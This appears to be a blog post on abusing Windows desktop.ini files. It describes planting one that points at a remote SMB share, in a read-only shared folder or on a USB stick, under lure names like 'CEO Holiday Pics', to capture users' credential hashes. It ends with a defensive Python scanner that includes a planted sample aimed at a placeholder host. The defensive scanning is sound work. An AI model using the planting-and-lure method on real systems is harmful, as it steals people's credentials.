Recently I had a *duh* moment while playing with the ‘opened folder’ canary technique used by – a Thinkst* project

One of the Canary triggers takes advantage of the way Microsoft Windows presents folders to its users: Explorer checks for a ==hidden== desktop.ini file that tells the OS which folder view preferences to apply.

The Canary works by pointing those preferences at a remote server; when that request comes in, we know the folder has been opened… very sneaky! (I didn’t know about this technique until I was exploring the available payloads – check them out

So I figured: if we point it at a remote location that requires SMB authentication, Windows will automatically send the current user’s credentials to that location, and I’ll get hashes!


If you are ever on a Red Team and have access to a shared folder, plant one in there (you will need to make the share read-only for the desktop.ini to persist) with a name like PeopleGettingSacked or Movies or CEO Holiday Pics… whatever, you know better than me…

Additionally, if you put the desktop.ini flat on a USB stick, then as soon as the stick is mounted (unless AutoRun is disabled) it will open the folder automatically, triggering the attack.
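From the defending side, the same property that makes this work (a desktop.ini value that resolves to a UNC path) is exactly what to hunt for on file shares and removable media. The scanner below is an added example, not code from the original post or from the Thinkst project: it walks a directory tree, decodes each desktop.ini (Explorer writes these as UTF-16 or ANSI), and flags any value in any section that contains a `\\host\share` reference, so it does not depend on knowing which particular key was abused. The host name `FILESERVER-PLACEHOLDER` and both sample files are constructed for the demonstration.

```python
import configparser
import re
from pathlib import Path

# Matches a UNC reference (\\host\share...) anywhere in a value, including the
# "@\\host\share\res.dll,-1" resource form. \\?\ device paths are excluded
# because '?' is not in the host character class.
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._-]+\\")


def decode_ini_bytes(data: bytes) -> str:
    """Explorer writes desktop.ini as UTF-16 LE or ANSI; honour a BOM if present."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def find_remote_references(text: str):
    """Return (section, key, value) for every desktop.ini value containing a UNC path."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.optionxform = str.lower  # keys are case-insensitive on Windows
    try:
        cp.read_string(text)
    except configparser.Error:
        # Malformed file: fall back to a plain line scan so nothing is missed.
        return [("?", "?", line.strip()) for line in text.splitlines() if UNC_RE.search(line)]
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if value and UNC_RE.search(value):
                findings.append((section, key, value))
    return findings


def scan_tree(root):
    """Walk a share or mounted volume; map each suspicious desktop.ini path to its findings."""
    results = {}
    for path in Path(root).rglob("desktop.ini"):
        try:
            text = decode_ini_bytes(path.read_bytes())
        except OSError:
            continue  # unreadable entries are skipped, not fatal
        hits = find_remote_references(text)
        if hits:
            results[str(path)] = hits
    return results


# Constructed samples (not from the original post): one file pointing at a
# placeholder remote host, one ordinary file pointing at a local system DLL.
SAMPLE_PLANTED = r"""[.ShellClassInfo]
IconResource=\\FILESERVER-PLACEHOLDER\share\folder.ico,0
"""

SAMPLE_BENIGN = r"""[.ShellClassInfo]
IconResource=C:\Windows\System32\SHELL32.dll,3
[ViewState]
FolderType=Generic
"""

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for ini_path, hits in scan_tree(root).items():
        for section, key, value in hits:
            print(f"{ini_path}: [{section}] {key}={value}")
```

Run it against the root of a share or a freshly mounted USB stick; a hit is worth correlating with outbound SMB (TCP 445) connection attempts from the machines that browsed that folder, and blocking outbound SMB at the perimeter removes the credential leak even if a planted file is missed.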

I bet this is already being used out there! … very sneaky/powerful, I had to share … in fact, I can’t help thinking this might be a very well known thing and I’m out of the loop -_-

I think there is some caching of the desktop.ini too (at least with Windows 10), as when I ejected my evil USB I could still see incoming requests from my machine – will follow up on that.

An in-depth look into options when writing a desktop.ini file, possibly more opportunities for trouble?

Attacker & User view: